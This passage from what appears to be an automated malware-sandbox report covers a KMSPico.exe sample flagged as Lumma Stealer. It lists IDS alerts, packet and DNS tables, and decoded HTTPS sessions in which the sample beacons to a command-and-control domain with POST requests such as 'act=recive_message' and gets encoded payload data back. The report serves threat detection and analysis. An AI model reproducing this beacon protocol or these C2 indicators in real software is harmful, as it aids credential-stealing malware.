GetSystemTimeAsFileTime, RaiseException, HeapReAlloc, LoadLibraryW, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, MultiByteToWideChar, GetStringTypeW, SetFilePointer
                                    USER32.dllSetActiveWindow, SetKeyboardState, CreateIcon, GetClassLongA
                                    GDI32.dllGetCharWidthW
                                    ADVAPI32.dllGetAce
                                    ole32.dllCoTaskMemFree
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Download Network PCAP: filteredfull

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    02/29/24-01:47:53.832376TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49705443192.168.2.5104.21.80.118
                                    02/29/24-01:48:00.206830TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49710443192.168.2.5104.21.80.118
                                    02/29/24-01:47:59.419425TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49709443192.168.2.5104.21.80.118
                                    02/29/24-01:47:53.145475UDP2050998ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (technologyenterdo .shop)6482153192.168.2.51.1.1.1
                                    02/29/24-01:48:01.392463TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49711443192.168.2.5104.21.80.118
                                    02/29/24-01:47:53.047409UDP2050955ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (problemregardybuiwo .fun)5863253192.168.2.51.1.1.1
                                    02/29/24-01:47:53.254875TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49704443192.168.2.5104.21.80.118
                                    02/29/24-01:47:55.834473TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49707443192.168.2.5104.21.80.118
                                    02/29/24-01:47:56.787043TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49708443192.168.2.5104.21.80.118
                                    02/29/24-01:47:54.800926TCP2051001ET TROJAN Observed Lumma Stealer Related Domain (technologyenterdo .shop in TLS SNI)49706443192.168.2.5104.21.80.118
                                    • Total Packets: 102
                                    • 443 (HTTPS)
                                    • 53 (DNS)
                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 29, 2024 01:47:53.252562046 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.252661943 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.252751112 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.254874945 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.254911900 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.448390961 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.448472023 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.451306105 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.451328993 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.451603889 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.493557930 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.531466007 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.531502962 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.531619072 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.825448990 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.825717926 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.825798035 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.828275919 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.828310013 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.828330994 CET49704443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.828337908 CET44349704104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.831789970 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.831821918 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:53.831907988 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.832376003 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:53.832387924 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.019648075 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.019717932 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.020916939 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.020925999 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.021169901 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.022381067 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.022404909 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.022444963 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.575508118 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.575805902 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.575875044 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.575891972 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.576625109 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.576673985 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.576680899 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577045918 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577090025 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.577095985 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577255011 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577300072 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.577306032 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577545881 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577594042 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.577600002 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577753067 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577795982 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.577801943 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577903032 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.577945948 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.577951908 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.578035116 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.578079939 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.587133884 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.587146997 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.587174892 CET49705443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.587178946 CET44349705104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.800396919 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.800440073 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.800529003 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.800925970 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.800966024 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.987303019 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.987478018 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.988651037 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.988660097 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.988893986 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:54.990272045 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.990436077 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:54.990469933 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:55.463917971 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:55.464035988 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:55.464255095 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.464255095 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.774780989 CET49706443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.774811983 CET44349706104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:55.833693027 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.833745956 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:55.833820105 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.834472895 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:55.834486008 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.020973921 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.021049976 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.022722960 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.022731066 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.022922993 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.024590015 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.024884939 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.024924040 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.024986029 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.024992943 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.506326914 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.506648064 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.506788015 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.507476091 CET49707443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.507522106 CET44349707104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.786261082 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.786367893 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.786492109 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.787043095 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.787075996 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.977895975 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.978259087 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.980424881 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.980456114 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.980731010 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.982371092 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.982575893 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.982614040 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:56.982707024 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:56.982723951 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:57.513959885 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:57.514065027 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:57.514156103 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:57.514420033 CET49708443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:57.514467001 CET44349708104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.418437958 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.418467045 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.418586969 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.419425011 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.419436932 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.617680073 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.617785931 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.619257927 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.619265079 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.619501114 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:47:59.620587111 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.620742083 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:47:59.620769978 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.099730015 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.099982023 CET44349709104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.100002050 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.100049019 CET49709443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.206186056 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.206252098 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.206356049 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.206830025 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.206860065 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.399436951 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.399538040 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.402555943 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.402586937 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.402863026 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.404074907 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.404216051 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.404227018 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.873116016 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.873361111 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:00.873475075 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:00.873476028 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.181049109 CET49710443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.181078911 CET44349710104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.391927958 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.392013073 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.392083883 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.392462969 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.392482042 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.588665009 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.588838100 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.590015888 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.590034962 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.590264082 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.591500044 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.592488050 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.592516899 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.592613935 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.592643976 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.592753887 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.592782974 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.592904091 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.592938900 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.593089104 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593122959 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.593301058 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593327999 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.593338013 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593353033 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.593491077 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593518019 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.593544960 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593678951 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.593713045 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.633915901 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.634490013 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.634524107 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.634553909 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.634572029 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.634605885 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.634620905 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:01.634710073 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:01.634727955 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:03.200050116 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:03.200330973 CET44349711104.21.80.118192.168.2.5
                                    Feb 29, 2024 01:48:03.200400114 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:03.200459003 CET49711443192.168.2.5104.21.80.118
                                    Feb 29, 2024 01:48:03.200483084 CET44349711104.21.80.118192.168.2.5
                                    TimestampSource PortDest PortSource IPDest IP
                                    Feb 29, 2024 01:47:53.047409058 CET5863253192.168.2.51.1.1.1
                                    Feb 29, 2024 01:47:53.140845060 CET53586321.1.1.1192.168.2.5
                                    Feb 29, 2024 01:47:53.145474911 CET6482153192.168.2.51.1.1.1
                                    Feb 29, 2024 01:47:53.243330956 CET53648211.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Feb 29, 2024 01:47:53.047409058 CET192.168.2.51.1.1.10xf0d8Standard query (0)problemregardybuiwo.funA (IP address)IN (0x0001)false
                                    Feb 29, 2024 01:47:53.145474911 CET192.168.2.51.1.1.10xdaa2Standard query (0)technologyenterdo.shopA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Feb 29, 2024 01:47:53.140845060 CET1.1.1.1192.168.2.50xf0d8Name error (3)problemregardybuiwo.funnonenoneA (IP address)IN (0x0001)false
                                    Feb 29, 2024 01:47:53.243330956 CET1.1.1.1192.168.2.50xdaa2No error (0)technologyenterdo.shop104.21.80.118A (IP address)IN (0x0001)false
                                    Feb 29, 2024 01:47:53.243330956 CET1.1.1.1192.168.2.50xdaa2No error (0)technologyenterdo.shop172.67.180.132A (IP address)IN (0x0001)false
                                    • technologyenterdo.shop
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549704104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:53 UTC269OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:53 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2024-02-29 00:47:53 UTC812INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=a0gi9idbpk8fbq58efqfqv98ei; expires=Sun, 23-Jun-2024 18:34:32 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fTox79jmODUc%2F%2BPub11xfeP6fzMhMlqeUtMW9K77kTtaK%2BQw0mRHLFhiq7JqBigp3lD%2FXgZf4OZfz8knfUu9QlksaRy0LuNXVkCD%2FOws%2FHYzsNx5thuH%2BYW7UvpKEHAWv3tygqWD83LT"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce6081af842d3-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2024-02-29 00:47:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549705104.21.80.1184433648C:\Users\user\Desktop\KMSPico.exe
                                    TimestampBytes transferredDirectionData
                                    2024-02-29 00:47:54 UTC270OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 52
                                    Host: technologyenterdo.shop
                                    2024-02-29 00:47:54 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 54 7a 70 32 63 71 2d 2d 4b 4d 53 26 6a 3d 64 65 66 61 75 6c 74
                                    Data Ascii: act=recive_message&ver=4.0&lid=Tzp2cq--KMS&j=default
                                    2024-02-29 00:47:54 UTC806INHTTP/1.1 200 OK
                                    Date: Thu, 29 Feb 2024 00:47:54 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=g28jil4tlkq5o7dsnhlk537od9; expires=Sun, 23-Jun-2024 18:34:33 GMT; Max-Age=9999999; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=s%2BXaj8DwFXbDX35J5yU9kZfAZwuUb5xhXKvu%2BvoQ3M3HQiO%2FMD0eRgg1tBkJq3FvzoxRyc2EvTnPMp8akh80%2FcNDPPUjaDY8jMbPJ9ALfF4yBTSEVUbFMlufDwVUDTp3Eiyix209dFtk"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 85cce60bb8f18c5d-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-02-29 00:47:54 UTC563INData Raw: 34 63 31 38 0d 0a 72 71 49 6a 48 77 51 42 30 4a 6c 2f 4c 7a 46 41 32 69 42 6c 4e 69 6a 72 6c 31 79 46 42 77 31 68 5a 39 50 2f 6c 44 73 75 57 35 6e 56 72 79 6b 2f 4a 43 48 77 75 77 6b 4e 43 32 44 75 44 47 67 38 43 4d 75 33 66 4b 64 30 61 45 4e 64 38 34 76 6d 54 6b 74 33 6c 4b 53 43 41 7a 38 6b 49 37 48 39 58 52 55 52 4a 72 74 4d 46 6c 4d 45 35 70 31 38 70 53 63 74 51 77 4b 72 33 61 34 62 64 56 61 54 6a 6f 49 44 50 79 51 68 71 35 52 31 44 78 46 67 2b 67 42 46 46 67 6a 4a 38 6a 4b 6e 50 53 31 44 41 72 6d 64 39 56 64 4d 4f 76 4c 42 30 6b 39 38 62 47 32 33 38 52 70 4d 56 53 47 32 54 51 42 54 54 59 72 39 4d 75 78 71 5a 51 78 46 2f 2f 4b 65 47 77 35 37 75 59 36 43 41 7a 38 6d 5a 4b 71 37 52 51 38 54 44 62 39 55 42 48 74 4a 6d 50 78 2b 69 41 30 74 51 55 66 7a 33
                                    Data Ascii: 4c18rqIjHwQB0Jl/LzFA2iBlNijrl1yFBw1hZ9P/lDsuW5nVryk/JCHwuwkNC2DuDGg8CMu3fKd0aENd84vmTkt3lKSCAz8kI7H9XRURJrtMFlME5p18pSctQwKr3a4bdVaTjoIDPyQhq5R1DxFg+gBFFgjJ8jKnPS1DArmd9VdMOvLB0k98bG238RpMVSG2TQBTTYr9MuxqZQxF//KeGw57uY6CAz8mZKq7RQ8TDb9UBHtJmPx+iA0tQUfz3
                                    2024-02-29 00:47:54 UTC1369INData Raw: 45 70 76 5a 6e 47 30 39 68 68 66 56 53 65 32 53 41 52 47 51 49 66 7a 50 65 35 75 5a 67 59 43 74 64 32 34 4e 69 52 37 75 59 36 43 41 7a 38 6b 49 66 4c 38 42 51 30 4c 59 50 68 6a 43 6c 39 47 67 2b 49 2b 70 77 6f 48 51 55 66 7a 33 37 51 62 55 33 65 55 70 49 49 44 50 79 51 68 38 4f 4a 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 72 4a 54 64 42 52 62 57 63 38 6c 68 49 4e 2f 58 49 7a 45 64 7a 61 32 79 30 38 52 31 4b 57 53 71 77 51 77 70 66 52 59 6e 77 4d 2b 4e 6a 59 77 49 41 38 64 4f 5a 4d 51 35 37 75 59 36 43 41 7a 38 6b 49 37 58 6a 58 52 55 52 59 70 5a 46 42 45 59 49 76 50 59 77 36 57 4a 35 51 32 72 5a 33 37 51 62 44 6e 75 35 30 34 34 75 46 53 51 68 38 4c 6c 66 44 30 70 4e 30 41 42 46 46 67 6a 4c 74 33 79 6c 4a 57 67 50 52 65 6e 66 74 6c 64 4a 4e 75 6e 4e
                                    Data Ascii: EpvZnG09hhfVSe2SARGQIfzPe5uZgYCtd24NiR7uY6CAz8kIfL8BQ0LYPhjCl9Gg+I+pwoHQUfz37QbU3eUpIIDPyQh8OJyJRFg+gBFFgjLtTnrJTdBRbWc8lhIN/XIzEdza2y08R1KWSqwQwpfRYnwM+NjYwIA8dOZMQ57uY6CAz8kI7XjXRURYpZFBEYIvPYw6WJ5Q2rZ37QbDnu5044uFSQh8LlfD0pN0ABFFgjLt3ylJWgPRenftldJNunN
                                    2024-02-29 00:47:54 UTC1369INData Raw: 6b 4c 38 4c 6c 66 44 78 46 67 2b 67 42 48 55 31 4c 4a 72 58 79 6e 54 32 77 58 42 72 76 66 77 31 70 43 4e 2f 7a 61 67 43 34 56 4a 43 48 77 75 56 38 50 54 47 7a 58 4b 6b 55 57 43 4d 75 33 66 50 34 4b 42 30 46 48 38 39 2b 30 47 77 35 37 75 38 76 4d 41 53 55 6b 49 37 2f 36 46 55 74 42 4c 62 56 42 43 56 70 46 6a 50 6f 32 35 32 56 69 42 67 47 36 6c 76 56 55 53 43 76 78 7a 4d 68 45 66 47 78 70 38 72 56 79 4a 52 46 67 2b 67 42 46 46 67 6a 4c 74 54 6e 2f 4a 54 64 42 52 59 43 4b 2f 52 74 35 4f 76 58 43 78 31 63 39 43 51 76 77 75 56 38 50 45 57 43 6e 44 47 67 38 43 4d 75 33 66 4b 55 6e 64 6d 78 74 38 39 2b 30 47 77 35 37 75 59 36 41 52 6e 45 6d 4f 2f 43 37 45 45 56 57 4a 37 64 44 44 56 70 50 67 2f 6b 32 36 57 5a 39 44 41 47 78 6b 66 35 54 51 54 66 2f 78 4d 6c 4b 64
